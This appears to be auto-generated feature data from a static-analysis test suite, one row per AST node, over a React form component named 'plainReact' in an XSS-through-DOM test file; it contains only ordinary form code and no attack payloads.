autogenerated/Xss/XssThroughDom/forms.js:60:7:65:1 | plainRe ... form>\\n) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:60:7:65:1 | plainRe ... form>\\n) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | 'arguments' object of function plainReact | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | 'arguments' object of function plainReact | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | 'arguments' object of function plainReact | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | 'arguments' object of function plainReact | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | 'arguments' object of function plainReact | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | () => ( ... form>\\n) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | () => ( ... form>\\n) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | () => ( ... form>\\n) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | exceptional return of function plainReact | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | exceptional return of function plainReact | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | exceptional return of function plainReact | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | exceptional return of function plainReact | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | exceptional return of function plainReact | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | return of function plainReact | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | return of function plainReact | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | return of function plainReact | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | return of function plainReact | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:60:20:65:1 | return of function plainReact | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:60:26:65:1 | (\\n < ... form>\\n) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:60:26:65:1 | (\\n < ... form>\\n) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:60:26:65:1 | (\\n < ... form>\\n) | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:60:26:65:1 | (\\n < ... form>\\n) | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:60:26:65:1 | (\\n < ... form>\\n) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:5:64:11 | | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:5:64:11 | | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:61:5:64:11 | | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:5:64:11 | | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:5:64:11 | | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:6:61:9 | form | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:6:61:9 | form | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:61:6:61:9 | form | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:6:61:9 | form | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:6:61:9 | form | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:11:61:18 | onSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:11:61:18 | onSubmit | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:61:11:61:18 | onSubmit | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:11:61:18 | onSubmit | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:11:61:18 | onSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:11:61:40 | onSubmi ... mit(e)} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:11:61:40 | onSubmi ... mit(e)} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:11:61:40 | onSubmi ... mit(e)} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:61:11:61:40 | onSubmi ... mit(e)} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:61:11:61:40 | onSubmi ... mit(e)} | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:11:61:40 | onSubmi ... mit(e)} | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:11:61:40 | onSubmi ... mit(e)} | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:11:61:40 | onSubmi ... mit(e)} | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:11:61:40 | onSubmi ... mit(e)} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:11:61:40 | onSubmi ... mit(e)} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:20 | plainSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:20 | plainSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:20 | plainSubmit | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:20 | plainSubmit | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:20 | plainSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:21 | e | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:21 | e | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:21 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:21 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:21 | e | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:21 | e | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:21 | e | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:21 | e | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:21 | e | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:21 | e | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | 'arguments' object of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | 'arguments' object of anonymous function | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | 'arguments' object of anonymous function | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | 'arguments' object of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | e => plainSubmit(e) | assignedToPropName | onSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | e => plainSubmit(e) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | e => plainSubmit(e) | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | e => plainSubmit(e) | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | e => plainSubmit(e) | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | e => plainSubmit(e) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | exceptional return of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | exceptional return of anonymous function | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | exceptional return of anonymous function | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | exceptional return of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | return of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | return of anonymous function | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | return of anonymous function | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:21:61:39 | return of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:26:61:36 | plainSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:26:61:36 | plainSubmit | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/XssThroughDom/forms.js:61:26:61:36 | plainSubmit | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:26:61:36 | plainSubmit | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:26:61:36 | plainSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:26:61:39 | exceptional return of plainSubmit(e) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:26:61:39 | exceptional return of plainSubmit(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:61:26:61:39 | exceptional return of plainSubmit(e) | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:26:61:39 | exceptional return of plainSubmit(e) | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:26:61:39 | exceptional return of plainSubmit(e) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:26:61:39 | plainSubmit(e) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:26:61:39 | plainSubmit(e) | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/XssThroughDom/forms.js:61:26:61:39 | plainSubmit(e) | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:26:61:39 | plainSubmit(e) | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:26:61:39 | plainSubmit(e) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:38:61:38 | e | CalleeFlexibleAccessPath | plainSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:61:38:61:38 | e | InputArgumentIndex | 0 | +| autogenerated/Xss/XssThroughDom/forms.js:61:38:61:38 | e | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:38:61:38 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/XssThroughDom/forms.js:61:38:61:38 | e | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:38:61:38 | e | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:38:61:38 | e | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:61:42:62:8 | \\n | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:61:42:62:8 | \\n | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:61:42:62:8 | \\n | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:61:42:62:8 | \\n | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:61:42:62:8 | \\n | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:9:62:83 | | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:9:62:83 | | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:62:9:62:83 | | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:9:62:83 | | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:9:62:83 | | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:10:62:14 | input | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:10:62:14 | input | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:62:10:62:14 | input | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:10:62:14 | input | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:10:62:14 | input | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:16:62:19 | type | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:16:62:19 | type | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:62:16:62:19 | type | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:16:62:19 | type | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:16:62:19 | type | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:16:62:26 | type="text" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:16:62:26 | type="text" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:16:62:26 | type="text" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:62:16:62:26 | type="text" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:62:16:62:26 | type="text" | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:16:62:26 | type="text" | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:16:62:26 | type="text" | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:16:62:26 | type="text" | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:16:62:26 | type="text" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:16:62:26 | type="text" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:21:62:26 | "text" | assignedToPropName | type | +| autogenerated/Xss/XssThroughDom/forms.js:62:21:62:26 | "text" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:21:62:26 | "text" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:62:21:62:26 | "text" | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:21:62:26 | "text" | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:21:62:26 | "text" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:28:62:32 | value | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:28:62:32 | value | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:62:28:62:32 | value | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:28:62:32 | value | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:28:62:32 | value | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:28:62:51 | value={ ... .value} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:28:62:51 | value={ ... .value} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:28:62:51 | value={ ... .value} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:62:28:62:51 | value={ ... .value} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:62:28:62:51 | value={ ... .value} | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:28:62:51 | value={ ... .value} | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:28:62:51 | value={ ... .value} | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:28:62:51 | value={ ... .value} | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:28:62:51 | value={ ... .value} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:28:62:51 | value={ ... .value} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:35:62:38 | this | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:35:62:38 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:62:35:62:38 | this | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:35:62:38 | this | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:35:62:38 | this | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:35:62:44 | this.state | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:35:62:44 | this.state | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:62:35:62:44 | this.state | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:35:62:44 | this.state | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:35:62:44 | this.state | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:35:62:50 | this.state.value | assignedToPropName | value | +| autogenerated/Xss/XssThroughDom/forms.js:62:35:62:50 | this.state.value | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:62:35:62:50 | this.state.value | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:62:35:62:50 | this.state.value | enclosingFunctionBody | form onSubmit e plainSubmit e \n input type text value state value onChange handleChange \n input type submit value Submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:62:35:62:50 | this.state.value | enclosingFunctionName | plainReact | +| autogenerated/Xss/XssThroughDom/forms.js:62:35:62:50 | this.state.value | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:62:40:62:44 | state | contextFunctionInterfaces | 